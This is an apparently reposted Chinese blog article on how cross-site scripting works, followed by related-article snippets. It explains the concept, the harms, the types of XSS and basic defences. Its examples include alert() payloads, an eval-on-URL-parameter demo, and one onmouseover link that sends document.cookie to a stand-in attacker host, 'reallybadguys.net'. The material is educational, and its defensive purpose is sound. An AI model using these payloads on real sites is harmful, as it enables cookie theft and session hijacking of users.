XSS攻击的原理

最新推荐文章于 2025-08-11 21:03:55 发布
转载 最新推荐文章于 2025-08-11 21:03:55 发布 · 636 阅读 · 0
文章标签:

#浏览器 #javascript

本文详细阐述了XSS攻击的概念、危害、分类及防御措施,旨在提高开发者对XSS攻击的认识,并提供有效预防手段,确保网站安全。 
**概念说明**

Xss(cross-site scripting)攻击指的是攻击者往Web页面里插入恶意html标签或者javascript代码,当用户浏览该页或者进行某些操作时,攻击者利用用户对原网站的信任,诱骗用户或浏览器执行一些不安全的操作或者向其它网站提交用户的私密信息。
比如:攻击者在论坛中放一个看似安全的链接,骗取用户点击后,窃取cookie中的用户私密信息;或者攻击者在论坛中加一个恶意表单,当用户提交表单的时候,却把信息传送到攻击者的服务器中,而不是用户原本以为的信任站点。
诸如此类,唯一能完全杜绝xss攻击的方法,就是禁用script,img等,显然这是不靠谱的,用户需要丰富的页面内容;当然我们可以用一些方法预防xss攻击,尽量减少xss造成的危害。

**XSS攻击的危害包括**

盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号
控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
盗窃企业重要的具有商业价值的资料
非法转账
强制发送电子邮件
网站挂马
控制受害者机器向其它网站发起攻击
举例:

    <body background=”javascript:alert(‘xssgotcha!’)”>
    <iframe src=javascript:alert(‘xssgotcha!’)></iframe>
    > <body onload=”a();”><script>function a(){alert(‘xss -gotcha!’);}</script><
**xss攻击分类**
分类方法一
xss攻击分为两类:从其它站点到应用站点的攻击、从应用站点到同站或其它站点的攻击
从其它站点到应用站点的攻击:故名思义,这种攻击是由外部发起的,来自email或其它站点。这种攻击在用户点击链接,下载图片或者提交表单的时候,对应用网站进行了意想之外的操作。
通常用户登录后会得到一个可用session,xss攻击者可以利用这个session,越过用户验证,进行一些不安全的操作,如下:

    <a href = “http:// www.2cto.com /addComment.php?subject = I%20am%20owned” >Check it out!</a>
通过这个链接,只要用户登录了,就会发送一个subject,即使在其它网站上。
正因如此,一般的邮箱客户端不会自动从不信任的网站上加载图片(因为考虑到可以通过img的src属性向第三方站点发送GET请求);另外,可以设置session的过期时间,让session自动失效。

从应用站点到同站或其它站点的攻击:这种攻击,通常是攻击者在应用站点上通过发表评论,或者其它方式嵌入代码,当用户加载页面或者点击链接就会产生一些意想之外的操作。
如下:

    <a href=”#” onmouSEOver = “window.location = ‘http://reallybadguys.net/collectCookie.php?cookie = + document cookie.escape();” >Check it out!</a>
当用户滑过链接,就会将cookie信息发到攻击者的服务器上。

分类方法二
xss的另一种分类方法(个人感觉更清楚),将xss攻击分为三种,
类型A,本地利用漏洞,这种漏洞存在于页面中客户端脚本自身。

**其攻击过程如下**:

Alice给Bob发送一个恶意构造了Web的URL。
Bob点击并查看了这个URL。
恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在Bob电脑上。
具有漏洞的HTML页面包含了在Bob电脑本地域执行的JavaScript。
Alice的恶意脚本可以在Bob的电脑上执行Bob所持有的权限下的命令。
类型B

反射式漏洞,这种漏洞和类型A有些类似,不同的是Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中。
反射/存储/DOM型XSS攻击原理攻击流程详解
G3et的博客
01-02 2354
XSS(跨站脚本攻击)是一种常见的 Web 安全漏洞,其允许攻击者在恶意用户的浏览器中执行脚本。这可能导致数据泄露、控制用户浏览器或执行其他恶意操作。 XSS 攻击通常利用网页的客户端代码(通常是 HTML 或 JavaScript)来执行。攻击者可能会向网页中插入恶意的 HTML 元素或 JavaScript 代码,试图欺骗浏览器执行攻击者的脚本。
xss攻击
qq_46312220的博客
08-18 463
2.1 Xss(跨站脚本攻击) 2.1.1 原理 恶意web用户通过将恶意脚本代码植入到提供给其他用户使用的页面中来达到攻击的目的 2.1.2 攻击类型: 反射型:通过把恶意代码放入url中进行注入,后端解析url并将恶意的代码拼接到html中返回给浏览器浏览器由于无法识别哪些是恶意代码就会解析执行。由于只有点击了这种带有恶意代码的url后攻击才能生效,所有攻击者往往诱导被攻击者点击攻击者指定的特色url。 存储型又称持久型:攻击者通过技术博客中的评论,留言,以及各种可能的方式将恶意代码提交到数据
Xss(cross-site scripting)攻击
stonehigher125的专栏
07-04 959
Xss(cross-site scripting)攻击指的是攻击者往Web页面里插入恶意html标签或者javascript代码,当用户浏览该页或者进行某些操作时,攻击者利用用户对原网站的信任,诱骗用户或浏览器执行一些不安全的操作或者向其它网站提交用户的私密信息。 比如:攻击者在论坛中放一个看似安全的链接,骗取用户点击后,窃取cookie中的用户私密信息;或者攻击者在论坛中加一个恶意表单,当用户
XSS漏洞及其原理(非常详细)零基础入门到精通,收藏这篇就够了
最新发布
2301_79455190的博客
08-11 771
XSS被称为跨站脚本攻击(Cross Site Scripting),由于和层叠样式表(Cascading Style Sheets,CSS)重名,改为XSS。主要基于JavaScript语言进行恶意攻击,因为js非常灵活操作html、css、浏览器。声明:本文所涉及到的仅用于学习交流使用,如有其他与本人无关。
XSS攻击原理
asdfghjkl978564的博客
09-19 159
XSS全称cross-site scripting攻击指的是攻击者往Web页面里插入恶意html标签或者JavaScript代码,当用户浏览该页或者进行某些操作时,攻击者利用用户对原网站的信任,诱骗用户或浏览器执行一些不安全的操作或者向其它网站提交用户的私密信息。 比如:(1)点击一个看起来安全的链接, (2)恶意的表单传递到攻击者的服务器上 分类:(1)存储型XSS (2)反射型X...
xss攻击原理与解决方法
热门推荐
套路猿的博客
04-14 7万+
概述XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨大的,是web安全的头号大敌。攻击的条件实施
跨站脚本攻击XSS)——常见网站攻击手段原理与防御
guugle2010的专栏
04-10 8570
主要是依靠一切可能的手段,将浏览器中可以执行的脚本(javascript)植入到页面代码中,从而对用户客户端实施攻击。这才是我认为在目前这个“大前端时代”xss攻击的定义。 实际上黑客攻击这种行为从本质上讲,就是想尽一切手段在别人的代码环境中执行自己的代码。
PHP如何防止XSS攻击XSS攻击原理的讲解
10-17
XSS攻击原理涉及Web应用程序如何处理用户输入的问题。在不经过适当过滤的情况下,用户输入的数据可能会被当作代码执行。比如,当一个Web表单用于收集用户信息,并将这些信息显示在页面上,如果开发者没有对这些信息...
XSS攻击原理及防御措施
qq_44169219的博客
11-04 3157
XSS,即跨站脚本攻击(Cross Site Scripting)攻击原理 恶意攻击者向web页面中插入恶意的代码,当用户浏览时,嵌入微博页面中的恶意代码将被执行。通过插入恶意脚本实现对用户浏览器的控制或窃取信息等目的。 参考以下几篇,都写的很好: 推一篇美团技术团队的文章,超级详细:https://www.freebuf.com/articles/web/185654.html 附常见的...
XSS防护:XSS攻击原理与类型.docx
08-28
XSS防护:XSS攻击原理与类型.docx
XSS攻击原理
飞鸟Blog
09-04 1万+
<br />跨站脚本攻击XSS攻击与防范指南 <br /><br />文章目录 <br /><br />XSS攻击与防范指南... 1 <br /><br />第一章、XSS的定义... 1 <br /><br />第二章、XSS漏洞代码... 1 <br /><br />第三章、利用XSS盗取cookies. 3 <br /><br />第四章、防范XSS漏洞... 4 <br /><br />第四章、XSS攻击方法... 4 <br /><br />第六章、利用Flash进行XSS攻击... 6 <br
XSS攻击-原理学习
an6992的博客
09-26 629
本文优先发布于简书https://www.jianshu.com/p/04e0f8971890 1、百度百科XSS,跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,通常将跨站脚本攻击缩写为XSSXSS攻击,通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令...
XSS攻击原理以及手段
weixin_33901843的博客
04-06 222
XSS攻击方式:反射型,存储型 存储型:两者差别仅在于,提交的代码会存储在服务器端(数据库,内存,文件系统等),下次请求目标页面时不用提交XSS代码 反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,所以称为发射型XSSXSS攻击的防范措施 编码 对用户输入...
XSS攻击原理及常见的XSS攻击
weixin_47218056的博客
09-25 6499
一、什么是XSS攻击XSS 即(Cross Site Scripting)中文名称为:跨站脚本攻击XSS的重点不在于跨站点,而在于脚本的执行。那么XSS原理是: 恶意攻击者在web页面中会插入一些恶意的script代码。当用户浏览该页面的时候,那么嵌入到web页面中script代码会执行,因此会达到恶意攻击用户的目的。那么XSS攻击最主要有如下分类:反射型、存储型、及 DOM-based型。 反射性和DOM-baseed型可以归类为非持久性XSS攻击。存储型可以归类为持久性XSS攻击。 二、反射性X
详解 XSS 攻击原理
听得到微笑的博客
10-29 1万+
跨站脚本攻击(Cross Site Scripting)本来的缩写为CSS,为了与层叠样式表(Cascading Style Sheets,CSS)的缩写进行区分,将跨站脚本攻击缩写为XSS。因此XSS是跨站脚本的意思。XSS跨站脚本攻击(Cross Site Scripting)的本质是攻击者在web页面插入恶意的script代码(这个代码可以是JS脚本、CSS样式或者其他意料之外的代码),当用户浏览该页面之时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。
XSS攻击原理、分类和防御方法
Andrew的博客
02-27 1万+
一.XSS攻击原理 XSS原理是WEB应用程序混淆了用户提交的数据和JS脚本的代码边界,导致浏览器把用户的输入当成了JS代码来执行。XSS攻击对象是浏览器一端的普通用户。   二.XSS攻击的分类 1.反射型XSS 反射型XSS,又称非持久型XSS。也就是攻击相当于受害者而言是一次性的,具体表现在受害者点击了含有的恶意JavaScript脚本的url,而Web应用程序只是不加处理的...
XSS攻击原理解析
海宇的博客
04-16 249
[size=large][b]XSS全称Cross Site Script,跨站脚本攻击[/b][/size] 它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 [size=large][b]主要途径[/b][/size] 1、对普通的用户输入,页面原样内容输出,(用户的输入包括coo...
XSS 攻击原理及防护
weixin_30609331的博客
08-07 195
  XSS跨站脚本攻击的英文全称是:cross-site scripting,它是 web 应用中最常见的一种计算机安全漏洞;恶意的网站用户可以通过它将一些代码插入其他用户访问的页面中去,这些代码通常是一些客户端脚本程序;攻击者能够利用这种漏洞去绕过一些访问控制、进行身份钓鱼、钓鱼攻击、网页挂马等等攻击行为,从而造成信息泄露甚至是大量的经济损失。   xss 漏洞攻击的特点:1)、xs...
155.XSS攻击原理
zjy123078_zjy的博客
02-22 380
XSS攻击XSS(Cross Site Script)攻击叫做跨站脚本攻击,他的原理是用户使用具有XSS漏洞的网站的时候,向这个网站提交一些恶意代码,当用户在访问这个网站的某个页面的时候,这个恶意的代码就会被执行,从而来破坏网页的结构,获取用户的隐私信息等。 XSS攻击场景: 比如现在有一个发布帖子的入口,如果用户在提交数据的时候,提交一段js代码,比如,,然后网页在渲染的时候直接将该代码渲染...
xss攻击原理
05-13
### XSS 攻击的工作原理 XSS(跨站脚本攻击)的核心机制在于恶意攻击者能够将未经授权的脚本代码注入到受信任的网页中,这些脚本会在受害者的浏览器环境中被执行[^1]。具体来说,当用户访问被篡改的页面时,嵌入其中的恶意脚本会被加载并运行,从而可能窃取用户的敏感信息、劫持会话或实施其他破坏行为。 #### XSS 的主要类型及其工作方式 1. **反射型 XSS** - 这种类型的攻击发生在恶意脚本作为输入的一部分发送给服务器,并由服务器返回至客户端执行的过程中[^2]。通常情况下,攻击者通过诱导用户点击一个带有恶意参数的 URL 来完成攻击。例如: ```html <a href="http://example.com/search?q=<script>alert('XSS')</script>">Click Me</a> ``` 当受害者点击此链接后,`<script>`标签中的代码将在其浏览器上下文中执行。 2. **存储型 XSS** - 存储型 XSS 是一种持久性的攻击形式,因为恶意脚本被永久保存在目标服务器数据库或其他存储介质中。一旦受害者访问含有该脚本的内容(如评论区留言),它便会自动触发。比如在一个留言板应用中,如果允许用户提交未经验证的数据,则可能会引入此类风险: ```javascript document.write("<img src='" + userInput + "' />"); ``` 3. **基于 DOM 的 XSS** - 不同于前两者依赖服务端处理来传播有效载荷,基于 DOM 的 XSS 完全依靠前端 JavaScript 动态修改文档对象模型 (Document Object Model)[^3]。这意味着即使服务器本身完全安全无懈可击,只要存在不当使用的交互逻辑仍可能导致问题。举个例子: ```javascript var urlParam = new URLSearchParams(window.location.search).get("param"); eval(urlParam); // 如果 param 包含恶意字符串... ``` 以上每种情况都表明了不同场景下如何利用未加防护的应用程序入口点来进行跨站点脚本入侵活动。 ### 实现方式概述 为了演示实际操作过程中的某些技术细节,下面给出一段简单的 HTML 和 JS 组合用于模拟反射型 XSS 场景: ```html <!-- 模拟易受影响的服务端渲染 --> <form action="/vulnerable_endpoint" method="GET"> Search: <input type="text" name="query"/> <button type="submit">Go</button> </form> <script> // 假设这里直接输出查询结果而不做任何清理 document.body.innerHTML += "<p>Your search was:" + location.href.split('?')[1].split('=')[1]+"</p>"; </script> ``` 假设上述表单提交路径 `/vulnerable_endpoint` 并不会对 `query` 参数加以适当编码转换的话,那么构造如下 GET 请求即可展示弹窗警告框效果——证明成功植入外部指令片段进入正常业务流程之中: ``` /vulnerable_endpoint?query=%3Cscript%3Ealert(%27Hacked!%27)%3C/script%3E ``` --- ### 防御建议简述 尽管本文重点介绍的是攻击手段而非解决方案,但仍需强调几个关键预防措施以减少潜在威胁面:始终采用白名单策略校验所有来自外界的数据;运用现代框架内置功能帮助规避常见陷阱;以及定期审查现有架构是否存在薄弱环节等问题均至关重要[^4]^。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值